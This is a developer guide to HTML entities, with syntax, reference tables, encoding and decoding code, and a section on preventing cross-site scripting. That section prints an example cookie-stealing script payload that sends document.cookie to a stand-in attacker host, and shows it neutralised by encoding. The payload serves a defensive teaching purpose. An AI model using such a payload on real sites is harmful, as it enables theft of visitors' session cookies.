HTML Entities Encoder: Complete Character Reference Guide

Published: April 2026 • 10 min read • Developer Tools Guide

HTML entities are a small but essential part of how the web represents text. Without them, you couldn't reliably display a less-than sign in your text, render accented characters in every environment, or safely embed user-generated content. Every time a browser encounters &lt; and renders it as <, HTML entities are doing their job.

This guide covers the complete picture: how HTML entities work under the hood, the essential reference tables you'll use daily, encoding and decoding strategies, and the critical role entities play in preventing cross-site scripting (XSS) attacks.

Table of Contents

  1. What Are HTML Entities?
  2. Entity Syntax: Named vs. Numeric
  3. Why Entities Are Necessary
  4. Complete Entity Reference
  5. Encoding and Decoding
  6. HTML Entities and XSS Prevention
  7. Best Practices

What Are HTML Entities?

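An HTML entity (the HTML specification calls it a character reference) is a sequence of characters that represents a single character that either can't be typed directly or has special meaning in HTML. Entities start with an ampersand (&) and end with a semicolon (;). Browsers still accept a handful of legacy names without the semicolon, such as &copy, but the specification treats the omission as a parse error, so always include it.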

When the browser parses HTML, it replaces each entity with its corresponding character before rendering. This means &amp; in your source code becomes & on screen, and &copy; becomes ©.

The HTML specification defines over 2,000 named entities (expanded significantly in HTML5), plus support for any Unicode character via numeric references.
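Python's standard library ships the HTML5 named-reference table as the dictionary html.entities.html5, which makes the size of the list easy to check. A minimal sketch (keys include the trailing semicolon, and a few legacy names also appear without one):

```python
from html.entities import html5

# html5 maps entity names (e.g. "copy;") to the characters they expand to.
with_semicolon = [name for name in html5 if name.endswith(";")]

print(len(html5))           # every entry, including legacy no-semicolon forms
print(len(with_semicolon))  # names written the standard way, with ";"
print(html5["copy;"])       # ©
print(html5["euro;"])       # €
```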

Entity Syntax: Named vs. Numeric

There are three ways to write an HTML entity:

Named Entities

Human-readable names defined by the HTML specification:

&amp;   → &   (ampersand)
&lt;    → <   (less-than)
&gt;    → >   (greater-than)
&copy;  → ©   (copyright)
&euro;  → €   (euro sign)
&nbsp;  →     (non-breaking space)

Named entities are preferred for readability and maintainability — any developer can understand &copy; at a glance.

Decimal Numeric Entities

Unicode code point in decimal, prefixed with &#:

&#38;   → &   (ampersand)
&#60;   → <   (less-than)
&#169;  → ©   (copyright)
&#8364; → €   (euro sign)

Hexadecimal Numeric Entities

Unicode code point in hexadecimal, prefixed with &#x:

&#x26;   → &   (ampersand)
&#x3C;   → <   (less-than)
&#xA9;   → ©   (copyright)
&#x20AC; → €   (euro sign)

💡 Tip: Named entities cover roughly 2,000 characters. For anything else (emoji, obscure symbols, characters beyond the Basic Multilingual Plane), use a numeric reference. The hexadecimal form is usually easier because Unicode charts list code points in hex: U+1F600 becomes &#x1F600;.
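Both numeric forms come straight from the character's code point. A minimal sketch; numeric_refs is a hypothetical helper, not a library function:

```python
def numeric_refs(ch: str) -> tuple[str, str]:
    """Return (decimal, hexadecimal) character references for one character."""
    cp = ord(ch)  # Unicode code point, e.g. 0x1F600 for 😀
    return f"&#{cp};", f"&#x{cp:X};"

print(numeric_refs("😀"))  # ('&#128512;', '&#x1F600;')
print(numeric_refs("©"))   # ('&#169;', '&#xA9;')
```

Both results decode to the same character, so the choice between decimal and hex is purely about readability.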

Why Entities Are Necessary

1. Reserving Special Characters

HTML treats <, >, &, ", and ' as syntax: < and > delimit tags, & starts an entity, and quotes delimit attribute values. If you need to display these characters as content (not markup), you must encode them:

<!-- Without entities, the browser reads "<y" as the start of a tag -->
<p>Use x<y to compare numbers</p>

<!-- Correct: entities preserve the intended content -->
<p>Use x&lt;y to compare numbers</p>
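Which characters need escaping also depends on where the text lands: quotation marks are harmless in element content but break a quoted attribute value. Python's html.escape exposes this through its quote parameter; a small sketch:

```python
import html

text = 'Tom "T" & <Jerry>'

# Element content: quote=False leaves quotation marks alone.
print(html.escape(text, quote=False))  # Tom "T" &amp; &lt;Jerry&gt;

# Attribute values: quote=True (the default) also escapes " and '.
print(f'<input value="{html.escape(text)}">')
```

The second line prints <input value="Tom &quot;T&quot; &amp; &lt;Jerry&gt;">, so the embedded quotes can no longer end the attribute early.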

2. Displaying Non-ASCII Characters

UTF-8 can represent every Unicode character, but entities are pure ASCII, so they provide a reliable fallback for characters that might be corrupted by encoding mismatches, email clients, or legacy systems:

&eacute;  → é    (e with acute)
&ntilde;  → ñ    (n with tilde)
&uuml;    → ü    (u with umlaut)
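When text has to pass through an ASCII-only channel, Python's built-in xmlcharrefreplace error handler converts every non-ASCII character into a decimal numeric reference. A minimal sketch:

```python
# Encode to ASCII, replacing each non-ASCII character with &#NNN;
text = "Señor Müller's café"
ascii_safe = text.encode("ascii", errors="xmlcharrefreplace").decode("ascii")
print(ascii_safe)  # Se&#241;or M&#252;ller's caf&#233;
```

Note that this handler leaves &, < and > untouched, so it complements HTML escaping rather than replacing it.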

3. Invisible and Whitespace Characters

By default, browsers collapse runs of ordinary spaces, tabs, and line breaks into a single space. Entities let you insert precise whitespace and invisible characters:

&nbsp;   → Non-breaking space (doesn't collapse)
&ensp;   → En space (half an em)
&emsp;   → Em space (one em)
&thinsp; → Thin space
&zwj;    → Zero-width joiner (for emoji sequences)
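These characters are easy to confuse because they all look like blank space (or like nothing at all). Decoding them shows which code point each one produces; a sketch using Python's html.unescape:

```python
import html

# Decode each entity and show the Unicode code point it stands for.
for entity in ["&nbsp;", "&ensp;", "&emsp;", "&thinsp;", "&zwj;"]:
    ch = html.unescape(entity)
    print(f"{entity:<9} U+{ord(ch):04X}")
```

A decoded &nbsp; (U+00A0) is not equal to a plain space, which is a common cause of string comparisons that fail for no visible reason.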

Complete Entity Reference

The Five Essential Entities

These five entities are mandatory knowledge for every web developer:

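Character   Named     Decimal   Hex       Purpose
&           &amp;     &#38;     &#x26;    Ampersand
<           &lt;      &#60;     &#x3C;    Less than
>           &gt;      &#62;     &#x3E;    Greater than
"           &quot;    &#34;     &#x22;    Double quote
'           &apos;    &#39;     &#x27;    Single quote (apostrophe)

Note: &apos; is defined in HTML5 and XML but not in HTML 4, so &#39; is the safer choice for markup that older parsers or email clients may read.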
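The three spellings in each row of the table are interchangeable. A quick sketch that checks this with Python's html.unescape:

```python
import html

# (named, decimal, hex) forms from the table above
rows = [
    ("&amp;", "&#38;", "&#x26;"),
    ("&lt;", "&#60;", "&#x3C;"),
    ("&gt;", "&#62;", "&#x3E;"),
    ("&quot;", "&#34;", "&#x22;"),
    ("&apos;", "&#39;", "&#x27;"),
]

for named, dec, hexa in rows:
    decoded = {html.unescape(named), html.unescape(dec), html.unescape(hexa)}
    # All three spellings must decode to exactly one character.
    assert len(decoded) == 1, (named, decoded)
    print(named, "->", decoded.pop())
```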

Common Symbols

Symbol  Named      Description
©       &copy;     Copyright
®       &reg;      Registered trademark
™       &trade;    Trademark
€       &euro;     Euro
£       &pound;    Pound sterling
¥       &yen;      Yen/Yuan
¢       &cent;     Cent
§       &sect;     Section sign
±       &plusmn;   Plus-minus
×       &times;    Multiplication
÷       &divide;   Division
°       &deg;      Degree
µ       &micro;    Micro sign
¶       &para;     Pilcrow/paragraph
…       &hellip;   Horizontal ellipsis
–       &ndash;    En dash
—       &mdash;    Em dash
←       &larr;     Left arrow
→       &rarr;     Right arrow
♥       &hearts;   Heart
✓       &check;    Check mark

Mathematical and Technical Symbols

Symbol  Named      Description
≤       &le;       Less than or equal
≥       &ge;       Greater than or equal
≈       &asymp;    Approximately equal
≠       &ne;       Not equal
∞       &infin;    Infinity
√       &radic;    Square root
∑       &sum;      Summation
π       &pi;       Pi
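Many symbols have more than one name (&le; and &leq; both produce ≤, for example). A short sketch that searches Python's html.entities.html5 table for every name mapping to a given character; entity_names is a hypothetical helper, not a standard-library function:

```python
from html.entities import html5

def entity_names(ch: str) -> list[str]:
    """Return every HTML5 entity (with ';') that expands to ch."""
    return sorted(f"&{name}" for name, value in html5.items()
                  if value == ch and name.endswith(";"))

print(entity_names("≤"))
print(entity_names("✓"))
```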

Encoding and Decoding

HTML encoding converts special characters into their entity equivalents. Decoding reverses the process. This is a fundamental operation in web development, especially when handling user input.

JavaScript

// Encode HTML entities
function escapeHTML(str) {
  return str
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&apos;');
}

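// Decode HTML entities (browser only: relies on the DOM).
// A <textarea> parses its content as text, so markup in str is not executed.
function unescapeHTML(str) {
  const el = document.createElement('textarea');
  el.innerHTML = str;
  return el.value;
}

// Note: TextEncoder converts strings to UTF-8 bytes; it does not produce
// HTML entities. When you must accept a subset of HTML rather than display
// plain text, sanitize it with a library such as DOMPurify instead.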
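The order of the replace() calls in escapeHTML matters: & must be handled first, otherwise the & inside every entity produced by the earlier steps is escaped again. The same logic transcribed to Python (escape_html is a hypothetical port of the JavaScript function) makes the difference visible:

```python
def escape_html(s: str, amp_first: bool = True) -> str:
    """Port of escapeHTML; amp_first=False reproduces the ordering bug."""
    rules = [("<", "&lt;"), (">", "&gt;"), ('"', "&quot;"), ("'", "&apos;")]
    amp = ("&", "&amp;")
    ordered = [amp] + rules if amp_first else rules + [amp]
    for char, entity in ordered:
        s = s.replace(char, entity)
    return s

print(escape_html("a < b"))                   # a &lt; b
print(escape_html("a < b", amp_first=False))  # a &amp;lt; b  (double-encoded)
```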

Python

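import html

user_input = '<b>Tom & Jerry</b>'  # example untrusted input

# Encode: & < > are always escaped; with the default quote=True,
# " and ' become &quot; and &#x27; as well
encoded = html.escape(user_input)  # '&lt;b&gt;Tom &amp; Jerry&lt;/b&gt;'

# Decode: resolves named, decimal, and hex references
decoded = html.unescape(encoded)   # '<b>Tom & Jerry</b>'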

PHP

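// Encode (ENT_QUOTES escapes both " and ')
$encoded = htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');

// Decode: pass the same flags so single quotes are decoded too
// (before PHP 8.1 the default flags left &#039; untouched)
$decoded = htmlspecialchars_decode($encoded, ENT_QUOTES);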

HTML Entities and XSS Prevention

Cross-site scripting (XSS) is one of the most common web vulnerabilities. It occurs when an attacker injects malicious JavaScript into a web page by embedding it in user content that the page renders without sanitization.

How XSS Works

Imagine a comment section where users can post messages. An attacker submits:

<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>

If the server renders this directly into the page, the script runs in every visitor's browser and sends the attacker every cookie readable from JavaScript, including any session cookie not marked HttpOnly.

How Entities Prevent XSS

When you HTML-encode the attacker's input, the browser treats it as text, not markup:

&lt;script&gt;fetch(&#39;https://evil.com/steal?cookie=&#39; + document.cookie)&lt;/script&gt;

The browser displays this as literal text: <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script> — no code execution.
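A minimal sketch of the same defense in server-side code, assuming a hypothetical render_comment template helper and Python's html.escape:

```python
import html

def render_comment(comment: str) -> str:
    """Hypothetical template helper: wrap a user comment in a <p> element."""
    # html.escape turns <, >, &, " and ' into entities before interpolation.
    return f"<p>{html.escape(comment)}</p>"

payload = "<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>"
print(render_comment(payload))
```

Python emits &#x27; for the apostrophe where the example above shows &#39;; both decode to the same character, and the <script> tag reaches the browser only as text.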

⚠️ Critical: HTML entity encoding is necessary but not sufficient for XSS prevention. It protects against reflected and stored XSS in HTML context, but you also need Content-Security-Policy headers, input validation, and context-aware encoding (different escaping for JavaScript strings, URLs, and CSS).

Context-Aware Encoding

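The correct encoding depends on where user data appears in the document: HTML entity encoding for element content and quoted attribute values, JavaScript string escaping for values placed inside scripts, percent-encoding for URL parameters, and CSS escaping for values inside style rules (or, better, not placing untrusted data there at all).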

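Rather than rolling your own, rely on your framework's built-in escaping (React's JSX expressions, Django's auto-escaped {{ var }}, Laravel Blade's {{ }}). When you genuinely need to accept user-supplied HTML, run it through an established sanitizer such as DOMPurify (JavaScript) or, in Python, nh3 (bleach, the long-standing option, is now deprecated).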
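To make the idea concrete, here is a sketch of per-context encoders built only on Python's standard library. The helper names are hypothetical and the set of contexts is deliberately small (CSS is left out); treat it as an illustration of why one escaping function is not enough, not as a substitute for your framework's escaping.

```python
import html
import json
import urllib.parse

def for_html(value: str) -> str:
    # Element content or a quoted attribute value.
    return html.escape(value, quote=True)

def for_url_param(value: str) -> str:
    # A single query-string value: percent-encode every reserved character.
    return urllib.parse.quote(value, safe="")

def for_js_string(value: str) -> str:
    # A JavaScript string literal inside <script>: JSON-encode, then escape
    # <, > and & so "</script>" cannot close the surrounding element.
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))

user = '</script><img src=x onerror=alert(1)> & "q"'
print(for_html(user))
print(for_url_param(user))
print(for_js_string(user))
```

The same input comes out three different ways, and each output is only safe in the context it was built for.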

Best Practices

  1. Always encode user-generated content. Never insert raw user input into HTML. Period.
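  2. Use your framework's auto-escaping. React, Vue, Angular, Django, and Laravel all escape by default. Don't bypass it with untrusted data (dangerouslySetInnerHTML in React, v-html in Vue, |safe in Django, {!! !!} in Laravel).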
  3. Prefer UTF-8 over entities for non-ASCII text. UTF-8 handles accented characters natively. Reserve entities for reserved characters, invisible characters, and channels that can't carry UTF-8 reliably.
  4. Use named entities for the "big five" characters. &amp;, &lt;, &gt;, &quot;, and &apos; should be second nature.
  5. Don't double-encode. Encoding & twice produces &amp;amp;, which displays as &amp; instead of &.
  6. Validate input, encode output. These are complementary defenses, not alternatives.
  7. Set the Content-Security-Policy header. Even with encoding, CSP provides defense-in-depth: a policy whose script-src omits 'unsafe-inline' blocks inline scripts.
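Double encoding usually happens when data is escaped on the way into storage and then again when it is rendered. The sketch below reproduces it with Python's html.escape:

```python
import html

raw = "Fish & Chips"
once = html.escape(raw)    # correct: encode exactly once, at output time
twice = html.escape(once)  # bug: the stored value was already encoded

print(once)   # Fish &amp; Chips
print(twice)  # Fish &amp;amp; Chips  (browser shows "Fish &amp; Chips")
```

Storing raw text and escaping only when rendering avoids the problem and keeps the stored value usable in non-HTML contexts such as JSON APIs or plain-text email.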

Conclusion

HTML entities are a small but critical part of web development. They solve three fundamental problems: displaying reserved characters, representing Unicode characters reliably, and, as one layer of defense, preventing XSS attacks. The five essential entities (&amp;, &lt;, &gt;, &quot;, &apos;) should be automatic in every developer's muscle memory. For everything else, keep a reference handy and let your framework's auto-escaping handle the heavy lifting. Understanding entities isn't just about knowing the syntax; it's about building secure, reliable web applications.